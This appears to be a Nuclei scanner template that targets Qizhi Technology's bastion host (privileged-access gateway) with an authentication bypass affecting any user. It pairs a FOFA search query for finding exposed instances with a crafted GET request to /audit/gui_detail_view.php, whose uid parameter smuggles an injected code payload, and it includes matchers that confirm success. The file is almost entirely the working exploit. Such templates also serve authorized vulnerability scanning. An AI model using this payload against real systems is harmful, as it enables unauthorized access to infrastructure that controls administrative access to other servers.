id: qizhi-fortres-anyuser-login

info:
  name: Qizhi Fortres Anyuser Login
  author: zp857
  severity: high
  tags: qizhi,anyuser-login
  metadata:
    fofa-query: 'app="齐治科技-堡垒机"'

requests:
  - method: GET
    path:
      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "错误的id"

      - type: status
        status:
          - 200